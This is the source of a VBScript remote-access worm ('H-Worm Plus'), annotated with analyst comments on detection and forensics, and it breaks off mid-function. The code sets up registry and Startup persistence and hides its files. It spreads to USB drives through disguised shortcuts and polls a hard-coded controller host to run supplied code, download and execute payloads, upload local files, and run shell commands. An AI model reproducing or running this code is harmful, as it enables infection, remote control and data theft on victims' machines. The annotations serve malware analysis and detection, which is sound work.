- "'<[ >> H-Worm Plus | ReNEW version by MeoIT << ]>
- ' <[ Add Functions and fixed some place ]>
- '<[ >> CREDIT and THANKS: njQ8, Houdini and me :) << ]>
- ' Script-level setup: COM helpers, install paths and the hard-coded controller settings.
- ' Identifiers are Vietnamese; short glosses are given where they help an analyst read the sample.
- ' Preferred install directory, expanded further down.
- SET_THUMUC_CAIDAT_SAU = "%appdata%"
- dim OBJ_WS_SHELL
- set OBJ_WS_SHELL = wscript.createobject("wscript.shell")
- dim OBJ_HE_THONG_TAPTIN
- ' "file system" object, used for every file operation in the script.
- set OBJ_HE_THONG_TAPTIN = createobject("scripting.filesystemobject")
- dim MANG_CUA_TUI
- ' HTTP client reused for the controller check-in.
- set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
- ' The installed copy keeps whatever file name the script was launched under.
- TEN_SAU_CAI_DAT = wscript.scriptname
- DUONG_DAN_SSTTAARRTTUUPP = OBJ_WS_SHELL.specialfolders ("startup") & "\"
- THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings(SET_THUMUC_CAIDAT_SAU) & "\"
- dim OBJ_SYS_ENV,OBJ_USER_ENV
- dim STR_DUONG_DAN_USER_TEMP
- dim STR_DUONG_DAN_SYS_TEMP
- dim STR_USER_PROFILE,STR_THU_MUC_FILE_TAM_IE
- set OBJ_SYS_ENV = OBJ_WS_SHELL.Environment("System")
- set OBJ_USER_ENV = OBJ_WS_SHELL.Environment("User")
- STR_DUONG_DAN_USER_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
- STR_DUONG_DAN_SYS_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
- STR_USER_PROFILE = OBJ_WS_SHELL.ExpandEnvironmentStrings("%userprofile%")
- ' Falls back to %temp% when the %appdata% folder does not exist, so hunts should cover both locations.
- if not OBJ_HE_THONG_TAPTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings("%temp%") & "\"
- ' Field delimiter used in controller responses, in the host-info string and in two request URLs.
- BO_CHIA_KY_TU = "<|>"
- ' Poll interval handed to wscript.sleep (milliseconds) by the main loop.
- THOI_GIAN_NGU = 4915
- dim KET_NOI_DA_SAN_SANG
- dim LENH_THUC_THI
- dim THONG_SO_CHO_LENH_THUC_THI
- CO_HAY_KHONG_TU_USB = ""
- dim LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT
- startdate = ""
- info = ""
- ' Network indicators for this sample: controller host name and TCP port, contacted over plain HTTP.
- DIA_CHI_IP_KET_NOI = "shkis.publicvm.com"
- CONG_KET_NOI = 83
- ' Toggles for replacing files / folders on removable drives with shortcuts; both are off in this sample.
- BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB = false
- BAT_TAT_LAY_LAN_LINK_THU_MUC_USB = false
- ' Main loop: run the start-up routine once, then poll the controller forever and dispatch
- ' whatever command comes back. Errors are suppressed throughout, so failures leave no visible trace.
- on error resume next
- BAT_DAU_CHAY_HAM
- while true
- ' Every iteration re-runs the analysis-tool check and the install / removable-drive routine,
- ' so removing persistence while the process is still alive is undone within one poll interval.
- CHONG_CAC_PROC
- CAI_DAT_VAO_USB_THU_MUC_USB
- KET_NOI_DA_SAN_SANG = ""
- ' Check-in request; the response is "<command><|><arg>[<|><arg>]".
- KET_NOI_DA_SAN_SANG = THANK_GOD_YOU_ARE_HERE("is-ready","")
- LENH_THUC_THI = split(KET_NOI_DA_SAN_SANG,BO_CHIA_KY_TU)
- select case LENH_THUC_THI(0)
- Case "excecute"
- ' Runs controller-supplied VBScript in-process. The token is spelled "excecute" on the wire,
- ' which network signatures should match literally.
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- execute THONG_SO_CHO_LENH_THUC_THI
- case "update"
- ' Overwrites the installed copy with the supplied text (mode 2 = write, -1 = Unicode),
- ' relaunches it with wscript.exe //B and exits this instance.
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
- set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,2,false,-1)
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.write THONG_SO_CHO_LENH_THUC_THI
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
- OBJ_WS_SHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chr(34)
- wscript.quit
- Case "uninstall"
- GO_BO_SUB
- case "send"
- ' File pulled from the controller, written to disk and run.
- DUA_FILE_LEN_VIC_ROI_CHAY_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
- Case "site-send"
- ' File pulled from an arbitrary URL, written to disk and run.
- LAY_FILE_THEO_URL_VA_THUC_THI_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
- case "recv"
- ' Local file uploaded to the controller.
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- LAY_FILE_VE_NHA_QUANLYFILE_HAM (THONG_SO_CHO_LENH_THUC_THI)
- Case "enum-driver"
- ' Drive, folder and process listings are posted back under matching "is-enum-*" paths.
- THANK_GOD_YOU_ARE_HERE "is-enum-driver",LAY_THONG_TIN_CAC_O_DIA_HAM
- case "enum-faf"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- THANK_GOD_YOU_ARE_HERE "is-enum-faf",LAY_THONG_TIN_THU_MUC_HAM(THONG_SO_CHO_LENH_THUC_THI)
- Case "enum-process"
- THANK_GOD_YOU_ARE_HERE "is-enum-process",LAY_TTIN_CAC_TIEN_TRINH_HAM
- case "cmd-shell"
- ' Shell command output is posted back under "is-cmd-shell".
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- THANK_GOD_YOU_ARE_HERE "is-cmd-shell",DIEU_KHIEN_CMD_HAM(THONG_SO_CHO_LENH_THUC_THI)
- Case "delete"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- XOA_TAP_TIN_VA_THU_MUC_SUB (THONG_SO_CHO_LENH_THUC_THI)
- case "exit-process"
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- TAT_TIEN_TRINH_SUB (THONG_SO_CHO_LENH_THUC_THI)
- Case "sleep"
- ' The new poll interval is obtained by eval() of the controller-supplied string.
- THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
- THOI_GIAN_NGU = eval(THONG_SO_CHO_LENH_THUC_THI)
- end select
- wscript.sleep THOI_GIAN_NGU
- wend
- ' Start-up routine: records whether the first run came from a drive root, installs persistence,
- ' then opens the installed copy and keeps the handle for the rest of the run.
- function BAT_DAU_CHAY_HAM
- on error resume next
- ' Marker stored as the default value of HKLM\software\<script base name>\.
- ' Forensic artifact: "true - <date>" or "false - <date>" gives the first-run date and origin.
- CO_HAY_KHONG_TU_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\")
- if CO_HAY_KHONG_TU_USB = "" then
- ' Path from the second character on equals ":\<script name>", i.e. the script sits in a drive root.
- if lcase(mid(wscript.scriptfullname,2)) = ":\" & lcase(TEN_SAU_CAI_DAT) then
- CO_HAY_KHONG_TU_USB = "true - " & date
- OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
- else
- CO_HAY_KHONG_TU_USB = "false - " & date
- OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
- end if
- end if
- CAI_DAT_VAO_MAY_SUB
- set RUT_GON_FNAME = OBJ_HE_THONG_TAPTIN.getfile(wscript.scriptfullname)
- set RUT_GON_FNAME_CAI = OBJ_HE_THONG_TAPTIN.getfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT)
- ' The comparison below has an empty body in this sample, so it has no effect.
- if lcase(RUT_GON_FNAME.shortpath) <> lcase(RUT_GON_FNAME_CAI.shortpath) then
- end if
- err.clear
- ' Opens the installed copy for append (8) without creating it; the script exits if that fails.
- ' NOTE(review): presumably this doubles as a single-instance check and keeps the file in use - confirm.
- set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,8,false,-1)
- if err.number > 0 then wscript.quit
- end function
- ' Installs persistence on the local machine. Artifacts an incident responder should look for:
- '   - Run values named after the script's base name under both HKCU and HKLM, with data
- '     wscript.exe //B "<install dir><script name>"
- '   - copies of the script in the install directory and the user's Startup folder,
- '     both flagged Hidden + System
- '   - the Explorer "Hidden" setting rewritten
- sub CAI_DAT_VAO_MAY_SUB()
- on error resume next
- CHUOI_PC = "."
- set DT_WIN_MGR = GetObject("winmgmts:" _
- & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
- set TIEN_TRINH_KO_CAI_NOT_RUN = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'filemonitor.exe'")
- ' Exits without installing when a process named filemonitor.exe is present.
- if TIEN_TRINH_KO_CAI_NOT_RUN.Count = 1 then
- wscript.quit
- end if
- OBJ_WS_SHELL.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
- OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
- OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,true
- OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
- ' 2+4 = Hidden + System file attributes.
- OBJ_HE_THONG_TAPTIN.GetFile(DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT).Attributes=2+4
- OBJ_HE_THONG_TAPTIN.GetFile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT).Attributes=2+4
- ' When the Explorer "Hidden" value reads as "1" or cannot be read, it is overwritten with 0.
- ' NOTE(review): presumably meant to stop Explorer from listing hidden files - confirm on a test host.
- if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" Then
- OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
- end if
- ' Ages out old content of the user temp, system temp and IE cache folders.
- XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_USER_TEMP
- XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_SYS_TEMP
- STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
- STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
- XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
- end sub
- ' Re-asserts local persistence, then copies the script to the root of every ready removable drive.
- ' Artifacts on an affected drive: a Hidden + System copy of the script in the root and, when the
- ' two toggles are enabled, original items hidden behind .lnk files that launch cmd.exe.
- ' Disabling script execution from removable media and showing hidden/system files help triage.
- sub CAI_DAT_VAO_USB_THU_MUC_USB
- on error resume next
- dim BO_TAO_LOI_TAT
- dim TEN_FILE_TRONG_USB
- dim TEN_THU_MUC_TRONG_USB
- dim BIEU_TUONG_LINK_FILE_TRONG_USB
- dim BIEU_TUONG_THU_MUC_TRONG_USB
- CAI_DAT_VAO_MAY_SUB
- for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- ' drivetype 1 = removable.
- if CAC_USB.drivetype = 1 then
- OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname, CAC_USB.path & "\" & TEN_SAU_CAI_DAT,true
- if OBJ_HE_THONG_TAPTIN.fileexists(CAC_USB.path & "\" & TEN_SAU_CAI_DAT) then
- OBJ_HE_THONG_TAPTIN.getfile(CAC_USB.path & "\" & TEN_SAU_CAI_DAT).attributes = 2+4
- end if
- for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").Files
- ' File-shortcut handling is skipped entirely while the script-level toggle is false.
- if not BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB then exit for
- TAP_TIN_DA_CO_TRONG_USB.attributes=0
- if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
- if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".") (ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
- TAP_TIN_DA_CO_TRONG_USB.attributes = 2+4
- if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
- TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
- ' Shortcut named after the original file: minimized window (7), target cmd.exe,
- ' arguments start the script first and the original file second.
- set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_TRONG_USB (0) & ".lnk")
- BO_TAO_LOI_TAT.windowstyle = 7
- BO_TAO_LOI_TAT.targetpath = "cmd.exe"
- BO_TAO_LOI_TAT.workingdirectory = ""
- BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAP_TIN_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- ' Icon is taken from the registered file class so the shortcut resembles the original.
- BIEU_TUONG_LINK_FILE_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\" & OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\." & split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))& "\") & "\defaulticon\")
- if instr(BIEU_TUONG_LINK_FILE_TRONG_USB,",") = 0 then
- BO_TAO_LOI_TAT.iconlocation = TAP_TIN_DA_CO_TRONG_USB.path
- else
- BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_LINK_FILE_TRONG_USB
- end if
- BO_TAO_LOI_TAT.save()
- end if
- end if
- end if
- next
- for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\" ).subfolders
- ' Folder-shortcut handling is skipped entirely while the script-level toggle is false.
- if not BAT_TAT_LAY_LAN_LINK_THU_MUC_USB then exit for
- THU_MUC_DA_CO_TRONG_USB.attributes = 2+4
- TEN_THU_MUC_TRONG_USB = THU_MUC_DA_CO_TRONG_USB.name
- set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_THU_MUC_TRONG_USB & ".lnk")
- BO_TAO_LOI_TAT.windowstyle = 7
- BO_TAO_LOI_TAT.targetpath = "cmd.exe"
- BO_TAO_LOI_TAT.workingdirectory = ""
- BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THU_MUC_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- BIEU_TUONG_THU_MUC_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr(BIEU_TUONG_THU_MUC_TRONG_USB,",") = 0 then
- BO_TAO_LOI_TAT.iconlocation = THU_MUC_DA_CO_TRONG_USB.path
- else
- BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_THU_MUC_TRONG_USB
- end if
- BO_TAO_LOI_TAT.save()
- next
- end if
- end if
- end if
- next
- err.clear
- end sub
- ' Controller-triggered self-removal. Notes for incident response:
- '   - both Run values and the three script copies (Startup, install dir, running path) are deleted
- '   - the user temp, system temp and IE cache folders are emptied, which also destroys
- '     unrelated evidence stored there
- '   - no line in this routine deletes the HKLM\software\<script base name>\ marker written at
- '     first run, so that key may survive as evidence of a past infection
- sub GO_BO_SUB
- on error resume next
- dim TEN_FILE_TRONG_USB
- OBJ_HE_THONG_TAPTIN.GetFile(wscript.scriptfullname).Attributes=0
- LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
- OBJ_WS_SHELL.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
- OBJ_WS_SHELL.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
- OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
- OBJ_HE_THONG_TAPTIN.deletefile THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT
- OBJ_HE_THONG_TAPTIN.deletefile wscript.scriptfullname,true
- ' Same Explorer "Hidden" rewrite as the install routine; the setting is not restored on removal.
- if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" then
- OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
- end if
- XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_USER_TEMP
- XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_SYS_TEMP
- STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
- STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
- XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
- ' Clean-up of ready removable drives (drivetype 1).
- for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- if CAC_USB.drivetype = 1 then
- for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").files
- on error resume next
- if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
- if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
- ' Non-shortcut file: clear its attributes, then delete either its companion .lnk
- ' or, when the file is the script copy itself, the file.
- TAP_TIN_DA_CO_TRONG_USB.attributes = 0
- if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
- TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
- OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_TRONG_USB(0) & ".lnk")
- else
- OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TAP_TIN_DA_CO_TRONG_USB.name)
- end if
- else
- ' Every .lnk in the drive root is deleted, whether or not this script created it.
- OBJ_HE_THONG_TAPTIN.deletefile(TAP_TIN_DA_CO_TRONG_USB.path)
- end if
- end if
- OBJ_HE_THONG_TAPTIN.DeleteFile wscript.scriptfullname,true
- next
- ' Root folders on the drive get their attributes cleared.
- for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").subfolders
- THU_MUC_DA_CO_TRONG_USB.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- ' Controller request helper: synchronous HTTP POST to http://<host>:<port>/<command> with the
- ' given body; returns the response text.
- ' Detection notes: traffic is unencrypted, the request path is the bare command word
- ' (e.g. /is-ready), and the host-information string is sent in a header set under the name
- ' "user-agent:", so the "<|>"-delimited profile is visible to a proxy or IDS.
- function THANK_GOD_YOU_ARE_HERE(LENH_THUC_THI,THONG_SO_CHO_LENH_THUC_THI)
- THANK_GOD_YOU_ARE_HERE = THONG_SO_CHO_LENH_THUC_THI
- MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/" & LENH_THUC_THI, false
- MANG_CUA_TUI.setrequestheader "user-agent:",HAM_TAP_HOP_CAC_INFOR
- MANG_CUA_TUI.send THONG_SO_CHO_LENH_THUC_THI
- THANK_GOD_YOU_ARE_HERE = MANG_CUA_TUI.responsetext
- end function
- ' "site-send" handler: downloads a file from a controller-supplied URL and runs it.
- ' URL_CHUA_FILE      - URL to fetch (HTTP GET).
- ' TEN_FILE_GUI_URL   - file name to save under %TEMP%\Luu_Tam_Nhe\.
- ' Detection notes: wscript.exe writing a new file into that staging folder and then
- ' launching it is a high-signal endpoint event.
- sub LAY_FILE_THEO_URL_VA_THUC_THI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
- CHUOI_LIEN_KET = URL_CHUA_FILE
- CHUOI_DAT_FILE_VAO_DAU = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\" & TEN_FILE_GUI_URL
- set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
- OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIEN_KET, false
- OBJ_LAY_FILE_URL_VA_CHAY.send
- set OBJ_HE_THONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
- ' Any earlier file of the same name is removed before the new one is written.
- if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
- end if
- ' Only an HTTP 200 response is saved; the body is written as binary (stream type 1).
- if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
- dim ADO_TAI_URL_CHAY
- set ADO_TAI_URL_CHAY = createobject("adodb.stream")
- with ADO_TAI_URL_CHAY
- .type = 1
- .open
- .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
- .savetofile CHUOI_DAT_FILE_VAO_DAU
- .close
- end with
- set ADO_TAI_URL_CHAY = nothing
- end if
- ' The saved file is launched through its short (8.3) path.
- if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
- end if
- end sub
- ' "send" handler: requests a file from the controller, saves it locally and runs it.
- ' URL_CHUA_FILE      - controller-side path; the part after the last backslash becomes the local name.
- ' THU_MUC_VIC_NHAN   - destination folder; defaults to %TEMP%\Luu_Tam_Nhe\ when empty.
- ' Detection notes: the request path is "/is-sending<|><path>", so the delimiter appears in the URL.
- sub DUA_FILE_LEN_VIC_ROI_CHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
- if THU_MUC_VIC_NHAN = "" then
- THU_MUC_VIC_NHAN = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\"
- end if
- CHUOI_DAT_FILE_VAO_DAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
- set OBJ_DUA_FILE_LEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
- OBJ_DUA_FILE_LEN_VIC_VA_CHAY.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-sending" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
- OBJ_DUA_FILE_LEN_VIC_VA_CHAY.send ""
- set OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN = createobject("scripting.filesystemobject")
- ' Any earlier file of the same name is removed before the new one is written.
- if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
- end if
- ' Only an HTTP 200 response is saved; the body is written as binary (stream type 1).
- if OBJ_DUA_FILE_LEN_VIC_VA_CHAY.status = 200 then
- dim ADO_TAI_DISKFILE_LEN_VA_CHAY
- set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
- with ADO_TAI_DISKFILE_LEN_VA_CHAY
- .type = 1
- .open
- .write OBJ_DUA_FILE_LEN_VIC_VA_CHAY.responsebody
- .savetofile CHUOI_DAT_FILE_VAO_DAU
- .close
- end with
- set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
- end if
- ' The saved file is launched through its short (8.3) path.
- if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
- OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
- end if
- end sub
- ' "recv" handler: reads a local file as binary and uploads it to the controller.
- ' URL_CHUA_FILE - local path of the file to upload.
- ' Detection notes: the request path is "/is-recving<|><local path>", so exfiltrated file
- ' paths are recoverable from proxy or packet logs; the POST body is the raw file content.
- function LAY_FILE_VE_NHA_QUANLYFILE_HAM(URL_CHUA_FILE)
- dim MANG_CUA_TUI,ADO_LAY_FILE_VE_NHA,BO_DEM_BUF_LAY_FILE_VE_NHA
- set ADO_LAY_FILE_VE_NHA = createobject("adodb.stream")
- with ADO_LAY_FILE_VE_NHA
- .type = 1
- .open
- .loadfromfile URL_CHUA_FILE
- BO_DEM_BUF_LAY_FILE_VE_NHA = .read
- .close
- end with
- set ADO_LAY_FILE_VE_NHA = nothing
- ' A local HTTP object is used here, shadowing the script-level one of the same name.
- set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
- MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-recving" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
- MANG_CUA_TUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
- end function
- ' "enum-driver" helper: returns one "<path>|<drivetype><|>" record per ready drive.
- function LAY_THONG_TIN_CAC_O_DIA_HAM()
- for each CAC_HDD_USB_DVD_CD in OBJ_HE_THONG_TAPTIN.drives
- if CAC_HDD_USB_DVD_CD.isready = true then
- LAY_THONG_TIN_CAC_O_DIA_HAM = LAY_THONG_TIN_CAC_O_DIA_HAM & CAC_HDD_USB_DVD_CD.path & "|" & CAC_HDD_USB_DVD_CD.drivetype & BO_CHIA_KY_TU
- end if
- next
- end function
- ' "enum-faf" helper: returns a listing of one folder.
- ' CAC_THU_MUC_GET_INF - folder path to list.
- ' Output starts with the folder path, followed by "<name>||d|<attributes>" for each subfolder
- ' and "<name>|<size>|f|<attributes>" for each file, all separated by "<|>".
- function LAY_THONG_TIN_THU_MUC_HAM(CAC_THU_MUC_GET_INF)
- LAY_THONG_TIN_THU_MUC_HAM = CAC_THU_MUC_GET_INF & BO_CHIA_KY_TU
- for each THU_MUC_DA_CO_TRONG_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).subfolders
- LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & THU_MUC_DA_CO_TRONG_MACHINE.name & "||d|" & THU_MUC_DA_CO_TRONG_MACHINE.attributes & BO_CHIA_KY_TU
- next
- for each TTIN_DA_CO_IN_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).files
- LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & TTIN_DA_CO_IN_MACHINE.name & "|" & TTIN_DA_CO_IN_MACHINE.size & "|f|" & TTIN_DA_CO_IN_MACHINE.attributes & BO_CHIA_KY_TU
- next
- end function
- ' "enum-process" helper: returns "<name>|<pid>|<executable path><|>" for every process
- ' reported by WMI Win32_Process (query flags 48 = return immediately, forward-only).
- function LAY_TTIN_CAC_TIEN_TRINH_HAM()
- on error resume next
- set OBJ_WMI_SER_PROC = getobject("winmgmts:\\.\root\cimv2")
- set CAC_DT_THEO_COT_PROC = OBJ_WMI_SER_PROC.execquery("select * from win32_process",,48)
